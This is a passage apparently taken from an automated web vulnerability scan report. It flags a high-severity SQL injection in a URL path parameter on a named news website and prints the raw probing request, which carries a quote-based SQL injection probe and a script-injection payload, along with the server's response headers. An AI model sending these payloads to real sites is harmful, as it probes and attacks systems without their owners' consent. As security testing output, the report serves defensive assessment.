Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.104. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m8vgi6a1mfd687lf7jouu8s291; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17